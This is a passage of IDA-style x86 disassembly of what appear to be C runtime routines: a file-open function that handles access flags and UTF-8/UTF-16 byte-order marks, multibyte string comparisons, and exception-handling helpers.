; ---------------------------------------------------------------------------
loc_40E17C: ; CODE XREF: sub_40E072+ED�j
mov [ebp+var_8], 2
jmp short loc_40E191
; ---------------------------------------------------------------------------
loc_40E185: ; CODE XREF: sub_40E072+E9�j
mov [ebp+var_8], 1
jmp short loc_40E191
; ---------------------------------------------------------------------------
loc_40E18E: ; CODE XREF: sub_40E072+E5�j
mov [ebp+var_8], ebx
loc_40E191: ; CODE XREF: sub_40E072+103�j
; sub_40E072+108�j ...
mov eax, [ebp+arg_8]
mov edx, 700h
and eax, edx
mov ecx, 400h
cmp eax, ecx
jg short loc_40E1E2
jz short loc_40E1D9
cmp eax, ebx
jz short loc_40E1D9
cmp eax, 100h
jz short loc_40E1D0
cmp eax, 200h
jz loc_40E254
cmp eax, 300h
jnz loc_40E117
mov [ebp+var_10], 2
jmp short loc_40E1FF
; ---------------------------------------------------------------------------
loc_40E1D0: ; CODE XREF: sub_40E072+13D�j
mov [ebp+var_10], 4
jmp short loc_40E1FF
; ---------------------------------------------------------------------------
loc_40E1D9: ; CODE XREF: sub_40E072+132�j
; sub_40E072+136�j
mov [ebp+var_10], 3
jmp short loc_40E1FF
; ---------------------------------------------------------------------------
loc_40E1E2: ; CODE XREF: sub_40E072+130�j
cmp eax, 500h
jz short loc_40E1F8
cmp eax, 600h
jz short loc_40E254
cmp eax, edx
jnz loc_40E117
loc_40E1F8: ; CODE XREF: sub_40E072+175�j
mov [ebp+var_10], 1
loc_40E1FF: ; CODE XREF: sub_40E072+15C�j
; sub_40E072+165�j ...
mov ecx, [ebp+arg_8]
mov eax, 100h
test ecx, eax
mov edi, 80h
jz short loc_40E222
mov edx, ds:dword_425F74
not edx
and edx, [ebp+arg_10]
test dl, dl
js short loc_40E222
xor edi, edi
inc edi
loc_40E222: ; CODE XREF: sub_40E072+19C�j
; sub_40E072+1AB�j
test cl, 40h
jz short loc_40E23E
or [ebp+var_C], 10000h
or edi, 4000000h
cmp [ebp+var_18], 2
jnz short loc_40E23E
or [ebp+var_8], 4
loc_40E23E: ; CODE XREF: sub_40E072+1B3�j
; sub_40E072+1C6�j
test cx, 1000h
jz short loc_40E247
or edi, eax
loc_40E247: ; CODE XREF: sub_40E072+1D1�j
test cl, 20h
jz short loc_40E25D
or edi, 8000000h
jmp short loc_40E268
; ---------------------------------------------------------------------------
loc_40E254: ; CODE XREF: sub_40E072+144�j
; sub_40E072+17C�j
mov [ebp+var_10], 5
jmp short loc_40E1FF
; ---------------------------------------------------------------------------
loc_40E25D: ; CODE XREF: sub_40E072+1D8�j
test cl, 10h
jz short loc_40E268
or edi, 10000000h
loc_40E268: ; CODE XREF: sub_40E072+1E0�j
; sub_40E072+1EE�j
call sub_40EEB0
cmp eax, 0FFFFFFFFh
mov [esi], eax
jnz short loc_40E28B
call sub_4057E6
mov [eax], ebx
or dword ptr [esi], 0FFFFFFFFh
call sub_4057D3
mov dword ptr [eax], 18h
jmp short loc_40E2DB
; ---------------------------------------------------------------------------
loc_40E28B: ; CODE XREF: sub_40E072+200�j
mov eax, [ebp+arg_0]
push ebx
push edi
push [ebp+var_10]
mov dword ptr [eax], 1
lea eax, [ebp+var_28]
push eax
push [ebp+var_8]
push [ebp+var_C]
push [ebp+arg_4]
call ds:dword_41D06C
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_40E2E7
mov esi, [esi]
mov eax, esi
and esi, 1Fh
imul esi, 28h
sar eax, 5
mov eax, ds:dword_433CA0[eax*4]
lea eax, [eax+esi+4]
and byte ptr [eax], 0FEh
loc_40E2CE: ; CODE XREF: sub_40E072+2A2�j
call ds:dword_41D0F0
push eax
call sub_4057F9
loc_40E2DA: ; CODE XREF: sub_40E072+345�j
pop ecx
loc_40E2DB: ; CODE XREF: sub_40E072+217�j
call sub_4057D3
mov eax, [eax]
jmp loc_40E6AB
; ---------------------------------------------------------------------------
loc_40E2E7: ; CODE XREF: sub_40E072+23F�j
push edi
call ds:dword_41D148
cmp eax, ebx
jnz short loc_40E316
mov esi, [esi]
mov eax, esi
and esi, 1Fh
imul esi, 28h
sar eax, 5
mov eax, ds:dword_433CA0[eax*4]
lea eax, [eax+esi+4]
and byte ptr [eax], 0FEh
push edi
call ds:dword_41D0DC
jmp short loc_40E2CE
; ---------------------------------------------------------------------------
loc_40E316: ; CODE XREF: sub_40E072+27E�j
cmp eax, 2
jnz short loc_40E321
or [ebp+var_1], 40h
jmp short loc_40E32A
; ---------------------------------------------------------------------------
loc_40E321: ; CODE XREF: sub_40E072+2A7�j
cmp eax, 3
jnz short loc_40E32A
or [ebp+var_1], 8
loc_40E32A: ; CODE XREF: sub_40E072+2AD�j
; sub_40E072+2B2�j
push edi
push dword ptr [esi]
call sub_40EC7F
mov eax, [esi]
mov edx, eax
and eax, 1Fh
imul eax, 28h
sar edx, 5
mov edx, ds:dword_433CA0[edx*4]
pop ecx
pop ecx
mov cl, [ebp+var_1]
or cl, 1
mov [edx+eax+4], cl
mov eax, [esi]
mov edx, eax
and eax, 1Fh
imul eax, 28h
sar edx, 5
mov edx, ds:dword_433CA0[edx*4]
lea eax, [edx+eax+24h]
and byte ptr [eax], 80h
mov [ebp+var_3], cl
and [ebp+var_3], 48h
mov [ebp+var_1], cl
jnz loc_40E3FD
test cl, 80h
jz loc_40E637
test byte ptr [ebp+arg_8], 2
jz short loc_40E3FD
push 2
or edi, 0FFFFFFFFh
push edi
push dword ptr [esi]
call sub_41075B
add esp, 0Ch
cmp eax, edi
mov [ebp+var_8], eax
jnz short loc_40E3BC
call sub_4057E6
cmp dword ptr [eax], 83h
jz short loc_40E3FD
loc_40E3B0: ; CODE XREF: sub_40E072+379�j
; sub_40E072+389�j ...
push dword ptr [esi]
call sub_408A4D
jmp loc_40E2DA
; ---------------------------------------------------------------------------
loc_40E3BC: ; CODE XREF: sub_40E072+32F�j
push 1
lea eax, [ebp+var_4]
push eax
push dword ptr [esi]
mov [ebp+var_4], bl
call sub_409DAD
add esp, 0Ch
test eax, eax
jnz short loc_40E3ED
cmp [ebp+var_4], 1Ah
jnz short loc_40E3ED
mov eax, [ebp+var_8]
cdq
push edx
push eax
push dword ptr [esi]
call sub_4105A7
add esp, 0Ch
cmp eax, edi
jz short loc_40E3B0
loc_40E3ED: ; CODE XREF: sub_40E072+35F�j
; sub_40E072+365�j
push ebx
push ebx
push dword ptr [esi]
call sub_41075B
add esp, 0Ch
cmp eax, edi
jz short loc_40E3B0
loc_40E3FD: ; CODE XREF: sub_40E072+305�j
; sub_40E072+318�j ...
test [ebp+var_1], 80h
jz loc_40E637
mov ecx, 74000h
test [ebp+arg_8], ecx
mov edi, 4000h
jnz short loc_40E425
mov eax, [ebp+var_14]
and eax, ecx
jnz short loc_40E422
or [ebp+arg_8], edi
jmp short loc_40E425
; ---------------------------------------------------------------------------
loc_40E422: ; CODE XREF: sub_40E072+3A9�j
or [ebp+arg_8], eax
loc_40E425: ; CODE XREF: sub_40E072+3A2�j
; sub_40E072+3AE�j
mov eax, [ebp+arg_8]
and eax, ecx
cmp eax, edi
jz short loc_40E472
cmp eax, 10000h
jz short loc_40E45E
cmp eax, 14000h
jz short loc_40E45E
cmp eax, 20000h
jz short loc_40E46C
cmp eax, 24000h
jz short loc_40E46C
cmp eax, 40000h
jz short loc_40E458
cmp eax, 44000h
jnz short loc_40E475
loc_40E458: ; CODE XREF: sub_40E072+3DD�j
mov [ebp+var_2], 1
jmp short loc_40E475
; ---------------------------------------------------------------------------
loc_40E45E: ; CODE XREF: sub_40E072+3C1�j
; sub_40E072+3C8�j
mov ecx, [ebp+arg_8]
mov eax, 301h
and ecx, eax
cmp ecx, eax
jnz short loc_40E475
loc_40E46C: ; CODE XREF: sub_40E072+3CF�j
; sub_40E072+3D6�j
mov [ebp+var_2], 2
jmp short loc_40E475
; ---------------------------------------------------------------------------
loc_40E472: ; CODE XREF: sub_40E072+3BA�j
mov [ebp+var_2], bl
loc_40E475: ; CODE XREF: sub_40E072+3E4�j
; sub_40E072+3EA�j ...
test [ebp+arg_8], 70000h
jz loc_40E637
test [ebp+var_1], 40h
mov [ebp+var_8], ebx
jnz loc_40E637
mov eax, [ebp+var_C]
mov ecx, 0C0000000h
and eax, ecx
cmp eax, 40000000h
jz loc_40E55B
cmp eax, 80000000h
jz short loc_40E522
cmp eax, ecx
jnz loc_40E637
mov eax, [ebp+var_10]
cmp eax, ebx
jbe loc_40E637
cmp eax, 2
jbe short loc_40E4D1
cmp eax, 4
jbe short loc_40E4F8
loc_40E4C8: ; CODE XREF: sub_40E072+500�j
cmp eax, 5
jnz loc_40E637
loc_40E4D1: ; CODE XREF: sub_40E072+44F�j
; sub_40E072+496�j ...
movsx eax, [ebp+var_2]
xor edi, edi
dec eax
jz loc_40E604
dec eax
jnz loc_40E637
mov [ebp+var_8], 0FEFFh
mov [ebp+var_10], 2
jmp loc_40E612
; ---------------------------------------------------------------------------
loc_40E4F8: ; CODE XREF: sub_40E072+454�j
push 2
push ebx
push ebx
push dword ptr [esi]
call sub_40CCBE
add esp, 10h
or eax, edx
jz short loc_40E4D1
push ebx
push ebx
push ebx
push dword ptr [esi]
call sub_40CCBE
and eax, edx
add esp, 10h
cmp eax, 0FFFFFFFFh
jz loc_40E3B0
loc_40E522: ; CODE XREF: sub_40E072+437�j
push 3
lea eax, [ebp+var_8]
push eax
push dword ptr [esi]
call sub_409DAD
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_40E3B0
cmp eax, 2
jz short loc_40E5AB
cmp eax, 3
jnz loc_40E5F6
cmp [ebp+var_8], 0BFBBEFh
jnz short loc_40E5AB
mov [ebp+var_2], 1
jmp loc_40E637
; ---------------------------------------------------------------------------
loc_40E55B: ; CODE XREF: sub_40E072+42C�j
mov eax, [ebp+var_10]
cmp eax, ebx
jbe loc_40E637
cmp eax, 2
jbe loc_40E4D1
cmp eax, 4
ja loc_40E4C8
push 2
push ebx
push ebx
push dword ptr [esi]
call sub_40CCBE
add esp, 10h
or eax, edx
jz loc_40E4D1
push ebx
push ebx
push ebx
push dword ptr [esi]
call sub_40CCBE
add esp, 10h
and eax, edx
loc_40E59D: ; CODE XREF: sub_40E072+590�j
cmp eax, 0FFFFFFFFh
jnz loc_40E637
jmp loc_40E3B0
; ---------------------------------------------------------------------------
loc_40E5AB: ; CODE XREF: sub_40E072+4CC�j
; sub_40E072+4DE�j
mov eax, [ebp+var_8]
and eax, 0FFFFh
cmp eax, 0FFFEh
jnz short loc_40E5D3
push dword ptr [esi]
call sub_408A4D
pop ecx
call sub_4057D3
push 16h
pop esi
mov [eax], esi
loc_40E5CC: ; CODE XREF: sub_40E072+C6�j
mov eax, esi
jmp loc_40E6AB
; ---------------------------------------------------------------------------
loc_40E5D3: ; CODE XREF: sub_40E072+546�j
cmp eax, 0FEFFh
jnz short loc_40E5F6
push ebx
push 2
push dword ptr [esi]
call sub_41075B
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_40E3B0
mov [ebp+var_2], 2
jmp short loc_40E637
; ---------------------------------------------------------------------------
loc_40E5F6: ; CODE XREF: sub_40E072+4D1�j
; sub_40E072+566�j
push ebx
push ebx
push dword ptr [esi]
call sub_41075B
add esp, 0Ch
jmp short loc_40E59D
; ---------------------------------------------------------------------------
loc_40E604: ; CODE XREF: sub_40E072+466�j
mov [ebp+var_8], 0BFBBEFh
mov [ebp+var_10], 3
loc_40E612: ; CODE XREF: sub_40E072+481�j
; sub_40E072+5C3�j
mov eax, [ebp+var_10]
sub eax, edi
push eax
lea eax, [ebp+edi+var_8]
push eax
push dword ptr [esi]
call sub_40D420
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_40E3B0
add edi, eax
cmp [ebp+var_10], edi
jg short loc_40E612
loc_40E637: ; CODE XREF: sub_40E072+30E�j
; sub_40E072+38F�j ...
mov eax, [esi]
mov ecx, eax
and eax, 1Fh
imul eax, 28h
sar ecx, 5
mov ecx, ds:dword_433CA0[ecx*4]
lea eax, [ecx+eax+24h]
mov cl, [eax]
xor cl, [ebp+var_2]
and cl, 7Fh
xor [eax], cl
mov eax, [esi]
mov ecx, eax
and eax, 1Fh
imul eax, 28h
sar ecx, 5
mov ecx, ds:dword_433CA0[ecx*4]
lea eax, [ecx+eax+24h]
mov ecx, [ebp+arg_8]
mov dl, [eax]
shr ecx, 10h
shl cl, 7
and dl, 7Fh
or cl, dl
cmp [ebp+var_3], bl
mov [eax], cl
jnz short loc_40E6A9
test byte ptr [ebp+arg_8], 8
jz short loc_40E6A9
mov esi, [esi]
mov eax, esi
and esi, 1Fh
imul esi, 28h
sar eax, 5
mov eax, ds:dword_433CA0[eax*4]
lea eax, [eax+esi+4]
or byte ptr [eax], 20h
loc_40E6A9: ; CODE XREF: sub_40E072+614�j
; sub_40E072+61A�j
mov eax, ebx
loc_40E6AB: ; CODE XREF: sub_40E072+270�j
; sub_40E072+55C�j
pop edi
pop esi
pop ebx
leave
retn
sub_40E072 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E6B0 proc near ; CODE XREF: sub_40E77C+14�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push 14h
push offset dword_421860
call __SEH_prolog4
xor esi, esi
mov [ebp+var_1C], esi
xor eax, eax
mov edi, [ebp+arg_10]
cmp edi, esi
setnz al
cmp eax, esi
jnz short loc_40E6EA
loc_40E6CF: ; CODE XREF: sub_40E6B0+47�j
; sub_40E6B0+5B�j
call sub_4057D3
push 16h
pop edi
mov [eax], edi
push esi
push esi
push esi
push esi
push esi
call sub_402F39
add esp, 14h
mov eax, edi
jmp short loc_40E743
; ---------------------------------------------------------------------------
loc_40E6EA: ; CODE XREF: sub_40E6B0+1D�j
or dword ptr [edi], 0FFFFFFFFh
xor eax, eax
cmp [ebp+arg_0], esi
setnz al
cmp eax, esi
jz short loc_40E6CF
cmp [ebp+arg_14], esi
jz short loc_40E70D
mov eax, [ebp+arg_C]
and eax, 0FFFFFE7Fh
neg eax
sbb eax, eax
inc eax
jz short loc_40E6CF
loc_40E70D: ; CODE XREF: sub_40E6B0+4C�j
mov [ebp+ms_exc.disabled], esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_1C]
push eax
mov eax, edi
call sub_40E072
add esp, 14h
mov [ebp+var_20], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40E74E
mov eax, [ebp+var_20]
cmp eax, esi
jz short loc_40E743
or dword ptr [edi], 0FFFFFFFFh
loc_40E743: ; CODE XREF: sub_40E6B0+38�j
; sub_40E6B0+8E�j
call __SEH_epilog4
retn
sub_40E6B0 endp
; =============== S U B R O U T I N E =======================================
sub_40E749 proc near ; DATA XREF: J8@F_7_S:00421878�o
xor esi, esi
mov edi, [ebp+18h]
sub_40E749 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40E74E proc near ; CODE XREF: sub_40E6B0+84�p
cmp [ebp-1Ch], esi
jz short locret_40E77B
cmp [ebp-20h], esi
jz short loc_40E773
mov eax, [edi]
mov ecx, eax
sar ecx, 5
and eax, 1Fh
imul eax, 28h
mov ecx, ds:dword_433CA0[ecx*4]
lea eax, [ecx+eax+4]
and byte ptr [eax], 0FEh
loc_40E773: ; CODE XREF: sub_40E74E+8�j
push dword ptr [edi]
call sub_40EE8E
pop ecx
locret_40E77B: ; CODE XREF: sub_40E74E+3�j
retn
sub_40E74E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E77C proc near ; CODE XREF: sub_4081FF+26D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push 1
push [ebp+arg_0]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40E6B0
add esp, 18h
pop ebp
retn
sub_40E77C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E79A proc near ; CODE XREF: sub_40E9B4+A�p
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
push esi
push [ebp+arg_8]
lea ecx, [ebp+var_14]
call sub_40271F
mov edx, [ebp+arg_0]
xor esi, esi
cmp edx, esi
jnz short loc_40E7E4
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
cmp [ebp+var_8], 0
jz short loc_40E7DA
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40E7DA: ; CODE XREF: sub_40E79A+37�j
mov eax, 7FFFFFFFh
jmp loc_40E9B1
; ---------------------------------------------------------------------------
loc_40E7E4: ; CODE XREF: sub_40E79A+19�j
push ebx
mov ebx, [ebp+arg_4]
cmp ebx, esi
jnz short loc_40E81B
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
cmp [ebp+var_8], 0
jz short loc_40E811
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40E811: ; CODE XREF: sub_40E79A+6E�j
mov eax, 7FFFFFFFh
jmp loc_40E9B0
; ---------------------------------------------------------------------------
loc_40E81B: ; CODE XREF: sub_40E79A+50�j
mov eax, [ebp+var_10]
cmp [eax+8], esi
jnz short loc_40E847
lea eax, [ebp+var_14]
push eax
push ebx
push edx
call sub_4027D6
add esp, 0Ch
cmp [ebp+var_8], 0
jz loc_40E9B0
mov ecx, [ebp+var_C]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp loc_40E9B0
; ---------------------------------------------------------------------------
loc_40E847: ; CODE XREF: sub_40E79A+87�j
push edi
mov edi, 200h
loc_40E84D: ; CODE XREF: sub_40E79A+1CD�j
movzx cx, byte ptr [edx]
movzx ecx, cx
movzx esi, cl
inc edx
test byte ptr [esi+eax+1Dh], 4
mov [ebp+arg_0], edx
jz short loc_40E8BB
cmp byte ptr [edx], 0
jnz short loc_40E86B
xor esi, esi
jmp short loc_40E8D7
; ---------------------------------------------------------------------------
loc_40E86B: ; CODE XREF: sub_40E79A+CB�j
push 1
push dword ptr [eax+4]
lea ecx, [ebp+var_4]
push 2
push ecx
push 2
dec edx
push edx
push edi
push dword ptr [eax+0Ch]
lea eax, [ebp+var_14]
push eax
call sub_40C2F9
add esp, 24h
cmp eax, 1
jnz short loc_40E896
movzx ax, [ebp+var_4]
jmp short loc_40E8B0
; ---------------------------------------------------------------------------
loc_40E896: ; CODE XREF: sub_40E79A+F3�j
cmp eax, 2
jnz loc_40E96C
movzx ax, [ebp+var_4]
movzx cx, [ebp+var_3]
shl ax, 8
add ax, cx
loc_40E8B0: ; CODE XREF: sub_40E79A+FA�j
inc [ebp+arg_0]
movzx esi, ax
mov eax, [ebp+var_10]
jmp short loc_40E8D7
; ---------------------------------------------------------------------------
loc_40E8BB: ; CODE XREF: sub_40E79A+C6�j
movzx edx, cx
lea ecx, [edx+eax]
test byte ptr [ecx+1Dh], 10h
jz short loc_40E8D4
movzx cx, byte ptr [ecx+11Dh]
movzx esi, cx
jmp short loc_40E8D7
; ---------------------------------------------------------------------------
loc_40E8D4: ; CODE XREF: sub_40E79A+12B�j
movzx esi, dx
loc_40E8D7: ; CODE XREF: sub_40E79A+CF�j
; sub_40E79A+11F�j ...
movzx cx, byte ptr [ebx]
movzx ecx, cx
movzx edx, cl
inc ebx
test byte ptr [edx+eax+1Dh], 4
jz short loc_40E93E
cmp byte ptr [ebx], 0
jnz short loc_40E8F2
xor ecx, ecx
jmp short loc_40E95A
; ---------------------------------------------------------------------------
loc_40E8F2: ; CODE XREF: sub_40E79A+152�j
push 1
push dword ptr [eax+4]
lea ecx, [ebp+var_4]
push 2
push ecx
push 2
lea ecx, [ebx-1]
push ecx
push edi
push dword ptr [eax+0Ch]
lea eax, [ebp+var_14]
push eax
call sub_40C2F9
add esp, 24h
cmp eax, 1
jnz short loc_40E91F
movzx ax, [ebp+var_4]
jmp short loc_40E935
; ---------------------------------------------------------------------------
loc_40E91F: ; CODE XREF: sub_40E79A+17C�j
cmp eax, 2
jnz short loc_40E96C
movzx ax, [ebp+var_4]
movzx cx, [ebp+var_3]
shl ax, 8
add ax, cx
loc_40E935: ; CODE XREF: sub_40E79A+183�j
movzx ecx, ax
mov eax, [ebp+var_10]
inc ebx
jmp short loc_40E95A
; ---------------------------------------------------------------------------
loc_40E93E: ; CODE XREF: sub_40E79A+14D�j
movzx edx, cx
lea ecx, [edx+eax]
test byte ptr [ecx+1Dh], 10h
jz short loc_40E957
movzx cx, byte ptr [ecx+11Dh]
movzx ecx, cx
jmp short loc_40E95A
; ---------------------------------------------------------------------------
loc_40E957: ; CODE XREF: sub_40E79A+1AE�j
movzx ecx, dx
loc_40E95A: ; CODE XREF: sub_40E79A+156�j
; sub_40E79A+1A2�j ...
cmp cx, si
jnz short loc_40E98B
test si, si
jz short loc_40E9A0
mov edx, [ebp+arg_0]
jmp loc_40E84D
; ---------------------------------------------------------------------------
loc_40E96C: ; CODE XREF: sub_40E79A+FF�j
; sub_40E79A+188�j
call sub_4057D3
mov dword ptr [eax], 16h
cmp [ebp+var_8], 0
jz short loc_40E984
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40E984: ; CODE XREF: sub_40E79A+1E1�j
mov eax, 7FFFFFFFh
jmp short loc_40E9AF
; ---------------------------------------------------------------------------
loc_40E98B: ; CODE XREF: sub_40E79A+1C3�j
sbb eax, eax
and eax, 2
dec eax
cmp [ebp+var_8], 0
jz short loc_40E9AF
mov ecx, [ebp+var_C]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp short loc_40E9AF
; ---------------------------------------------------------------------------
loc_40E9A0: ; CODE XREF: sub_40E79A+1C8�j
cmp [ebp+var_8], 0
jz short loc_40E9AD
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40E9AD: ; CODE XREF: sub_40E79A+20A�j
xor eax, eax
loc_40E9AF: ; CODE XREF: sub_40E79A+1EF�j
; sub_40E79A+1FB�j ...
pop edi
loc_40E9B0: ; CODE XREF: sub_40E79A+7C�j
; sub_40E79A+9B�j ...
pop ebx
loc_40E9B1: ; CODE XREF: sub_40E79A+45�j
pop esi
leave
retn
sub_40E79A endp
; =============== S U B R O U T I N E =======================================
sub_40E9B4 proc near ; CODE XREF: sub_4081FF+1E6�p
; sub_4081FF+203�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 0
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_40E79A
add esp, 0Ch
retn
sub_40E9B4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E9C7 proc near ; CODE XREF: sub_40EB30+E�p
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
xor ebx, ebx
cmp [ebp+arg_8], ebx
jnz short loc_40E9DC
xor eax, eax
jmp loc_40EB19
; ---------------------------------------------------------------------------
loc_40E9DC: ; CODE XREF: sub_40E9C7+C�j
push edi
push [ebp+arg_C]
lea ecx, [ebp+var_10]
call sub_40271F
mov edi, [ebp+var_C]
cmp [edi+8], ebx
jnz short loc_40EA16
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40C8F9
add esp, 0Ch
cmp [ebp+var_4], bl
jz loc_40EB18
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp loc_40EB18
; ---------------------------------------------------------------------------
loc_40EA16: ; CODE XREF: sub_40E9C7+27�j
cmp [ebp+arg_0], ebx
jnz short loc_40EA49
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
cmp [ebp+var_4], bl
jz short loc_40EA3F
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40EA3F: ; CODE XREF: sub_40E9C7+6F�j
mov eax, 7FFFFFFFh
jmp loc_40EB18
; ---------------------------------------------------------------------------
loc_40EA49: ; CODE XREF: sub_40E9C7+52�j
push esi
mov esi, [ebp+arg_4]
cmp esi, ebx
jnz short loc_40EA7F
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
cmp [ebp+var_4], bl
jz short loc_40EA75
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40EA75: ; CODE XREF: sub_40E9C7+A5�j
mov eax, 7FFFFFFFh
jmp loc_40EB17
; ---------------------------------------------------------------------------
loc_40EA7F: ; CODE XREF: sub_40E9C7+88�j
; sub_40E9C7+13C�j
mov eax, [ebp+arg_0]
movzx cx, byte ptr [eax]
dec [ebp+arg_8]
movzx ecx, cx
movzx edx, cl
inc eax
test byte ptr [edx+edi+1Dh], 4
mov [ebp+arg_0], eax
jz short loc_40EAC6
cmp [ebp+arg_8], ebx
jnz short loc_40EAB0
movzx eax, byte ptr [esi]
xor ecx, ecx
test byte ptr [eax+edi+1Dh], 4
jnz short loc_40EB09
movzx eax, ax
jmp short loc_40EAF6
; ---------------------------------------------------------------------------
loc_40EAB0: ; CODE XREF: sub_40E9C7+D6�j
mov al, [eax]
cmp al, bl
jnz short loc_40EABA
xor ecx, ecx
jmp short loc_40EAC6
; ---------------------------------------------------------------------------
loc_40EABA: ; CODE XREF: sub_40E9C7+ED�j
xor edx, edx
inc [ebp+arg_0]
mov dh, cl
mov dl, al
movzx ecx, dx
loc_40EAC6: ; CODE XREF: sub_40E9C7+D1�j
; sub_40E9C7+F1�j
movzx ax, byte ptr [esi]
movzx eax, ax
movzx edx, al
inc esi
test byte ptr [edx+edi+1Dh], 4
jz short loc_40EAF6
cmp [ebp+arg_8], ebx
jnz short loc_40EAE1
loc_40EADD: ; CODE XREF: sub_40E9C7+121�j
xor eax, eax
jmp short loc_40EAF6
; ---------------------------------------------------------------------------
loc_40EAE1: ; CODE XREF: sub_40E9C7+114�j
mov dl, [esi]
dec [ebp+arg_8]
cmp dl, bl
jz short loc_40EADD
xor ebx, ebx
mov bh, al
inc esi
mov bl, dl
movzx eax, bx
xor ebx, ebx
loc_40EAF6: ; CODE XREF: sub_40E9C7+E7�j
; sub_40E9C7+10F�j ...
cmp ax, cx
jnz short loc_40EB1C
cmp cx, bx
jz short loc_40EB09
cmp [ebp+arg_8], ebx
jnz loc_40EA7F
loc_40EB09: ; CODE XREF: sub_40E9C7+E2�j
; sub_40E9C7+137�j
cmp [ebp+var_4], bl
jz short loc_40EB15
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40EB15: ; CODE XREF: sub_40E9C7+145�j
xor eax, eax
loc_40EB17: ; CODE XREF: sub_40E9C7+B3�j
; sub_40E9C7+15E�j ...
pop esi
loc_40EB18: ; CODE XREF: sub_40E9C7+3D�j
; sub_40E9C7+4A�j ...
pop edi
loc_40EB19: ; CODE XREF: sub_40E9C7+10�j
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40EB1C: ; CODE XREF: sub_40E9C7+132�j
sbb eax, eax
and eax, 2
dec eax
cmp [ebp+var_4], bl
jz short loc_40EB17
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp short loc_40EB17
sub_40E9C7 endp
; =============== S U B R O U T I N E =======================================
sub_40EB30 proc near ; CODE XREF: sub_4081FF+1D1�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 0
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_40E9C7
add esp, 10h
retn
sub_40EB30 endp
; ---------------------------------------------------------------------------
align 4
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_40EB60
push dword ptr [ebp+8]
call sub_413976
loc_40EB60: ; DATA XREF: J8@F_7_S:0040EB53�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40EB68: ; DATA XREF: sub_40EBAD+B�o
; J8@F_7_S:0040EC3A�o
mov ecx, [esp+4]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_40EBAC
mov eax, [esp+14h]
mov ecx, [eax-4]
xor ecx, eax
call sub_402710
push ebp
mov ebp, [eax+10h]
mov edx, [eax+28h]
push edx
mov edx, [eax+24h]
push edx
call sub_40EBAD
add esp, 8
pop ebp
mov eax, [esp+8]
mov edx, [esp+10h]
mov [edx], eax
mov eax, 3
locret_40EBAC: ; CODE XREF: J8@F_7_S:0040EB78�j
retn
; =============== S U B R O U T I N E =======================================
sub_40EBAD proc near ; CODE XREF: J8@F_7_S:0040EB94�p
var_20 = dword ptr -20h
var_18 = dword ptr -18h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push ebp
push eax
push 0FFFFFFFEh
push offset loc_40EB68
push large dword ptr fs:0
mov eax, ds:dword_423064
xor eax, esp
push eax
